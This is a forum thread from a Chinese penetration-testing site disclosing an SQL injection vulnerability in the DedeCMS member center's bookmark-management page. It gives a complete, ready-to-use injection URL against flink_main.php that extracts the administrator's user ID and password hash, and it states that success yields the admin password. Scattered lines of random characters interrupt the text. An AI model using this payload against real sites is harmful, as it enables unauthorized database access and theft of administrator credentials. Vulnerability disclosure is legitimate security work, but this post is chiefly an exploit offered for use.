中国网络渗透测试联盟
标题:
DedeCMS会员中心书签管理SQL注射漏洞
[打印本页]
作者:
admin
时间:
2012-12-31 09:21
标题:
DedeCMS会员中心书签管理SQL注射漏洞
DedeCMS会员中心SQL注射漏洞
+ w3 L5 T' n" h' Q) p
需要magic_quotes_gpc = Off
- p$ @ y- G% F8 I/ S8 q
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
) ^8 E" Z5 B3 F* x* k
# ^+ s+ D: X8 W s8 \
DedeCMS会员中心书签管理SQL注射漏洞
0 q6 o. c: d8 i/ k
成功利用该漏洞可获得管理员密码
! U8 n7 x o4 B k9 Z- B# O( s" n$ M
- }* C- P* n9 J& j4 `
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
+ |6 ]: X+ I4 F8 D+ \
/ K; S b. A. ?, p) L# V) E/ w
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
/ ~0 u" f+ A& `
作者:
kook
时间:
2013-1-10 01:33
#89 顶起。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2